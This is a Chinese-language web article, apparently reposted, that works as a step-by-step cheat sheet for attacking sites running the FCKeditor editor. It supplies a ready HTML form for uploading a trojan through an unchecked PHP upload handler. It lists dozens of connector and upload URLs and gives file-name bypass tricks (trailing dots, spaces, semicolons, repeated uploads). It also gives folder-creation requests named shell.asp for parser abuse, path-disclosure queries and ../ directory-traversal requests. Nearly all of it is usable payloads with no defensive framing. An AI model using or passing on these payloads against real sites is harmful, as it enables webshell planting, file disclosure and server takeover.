查看fckeditor編輯器版本

/_whatsnew.html /editor/dialog/fck_about.html

• 查出版本信息之后就可以到網(wǎng)上搜相應的漏洞

version2.2

Apache+linux 環(huán)境下在上傳文件后面加個.突破

version<=2.4.2 For php

• 該版本在處理PHP上傳的地方?jīng)]有對Media類型進行上傳文件類型的控制，導致用戶上傳任意文件。
• 將以下保存為html文件，action別忘了改成自己的，然后就可以上傳木馬，不知道上傳路徑就用bp抓包。

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxxx.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form>

test文件的上傳地址（結合解析漏洞）

FCKeditor/editor/filemanager/browser/default/connectors/test.html（2.4.3）
FCKeditor/editor/filemanager/upload/test.html（2.4.3）
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
如圖，發(fā)現(xiàn)有上傳，但是有可能是測試用的，并不能真正上傳木馬，這時候去嘗試其他的鏈接。

其他上傳地址

FCKeditor/_samples/default.html（2.4.3）

FCKeditor/_samples/asp/sample01.asp（2.4.3）

FCKeditor/_samples/asp/sample02.asp（2.4.3）

FCKeditor/_samples/asp/sample03.asp（2.4.3）

FCKeditor/_samples/asp/sample04.asp（2.4.3）

FCKeditor/_samples/default.html

FCKeditor/editor/fckeditor.htm

FCKeditor/editor/fckdialog.html

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?
Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp？Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html？type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php （2.6.3）

FCKeditor/editor/filemanager/browser/default/browser.html？Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/connectors/test.html（2.6.6）

FCKeditor/editor/filemanager/connectors/uploadtest.html（2.6.6）

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php
可以嘗試利用工具，如圖。

突破文件名限制“.”變“_”下劃線

1.提交1.php+空格繞過：空格只支持windows系統(tǒng)，linux系統(tǒng)是不支持的，可提交1.php+空格來繞過文件名限制。
2.可以在之前的文件夾x.asp下再新建一個文件夾xx.asp，這樣只檢測了第一級的目錄xx.asp，如果第二級目錄x.asp就不會受限制，把木馬上傳到x.asp中即可?？梢酝ㄟ^下面的建立文件夾突破，也可以通過bp抓包


%2f在這里就是/，我們可以把這里改為/cc.asp
3.二次上傳：繼續(xù)上傳同名文件可變?yōu)?.php;(1).jpg，很多時候上傳的文件例如1.php;.jpg 會變?yōu)?_php;.jpg ，上傳兩次1.asp;jpg來突破。

突破建立文件夾

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=124478997568

爆路徑漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

FCKeditor被動限制策略所導致的過濾不嚴問題

影響版本: <= FCKeditor v2.4.3

FCKeditor v2.4.3 中File 類別默認拒絕上傳類型：
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

• Fckeditor 2.0 <= 2.2 允許上傳asa、cer、php2、php4、inc、pwml、pht 后綴的文件，上傳后它保存的文件直接用的$sFilePath=$sServerDir.$sFileName，而沒有使用$sExtension 為后綴.直接導致在win 下在上傳文件后面加個.來突破。
• 而在apache 下，因為"Apache 文件名解析缺陷漏洞"也可以利用之，其他上傳漏洞中定義TYPE 變量時使用File類別來上傳文件,根據(jù)FCKeditor 的代碼，其限制最為狹隘。

jsp版本漏洞

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFold=/

上傳馬所在的目錄：

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

上傳shell的地址：

FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector

列目錄漏洞

1.修改CurrentFolder 參數(shù)使用 …/…/來進入不同的目錄：
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…/（2.4.1）
2.根據(jù)xml返回信息查看網(wǎng)站目錄：
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=…/…/…/&NewFolderName=shell.asp

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

3.獲取當前文件夾

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
4.瀏覽E盤文件：
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/
5.FCKeditor/editor/fckeditor.html 不可以上傳文件，可以點擊上傳圖片按鈕再選擇瀏覽服務器即可跳轉(zhuǎn)至可上傳文件頁，可以查看已經(jīng)上傳的文件。
6.遍歷目錄
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=…/…

browser

fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=…/…/connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

總結

以上是生活随笔為你收集整理的fckeditor编辑器漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。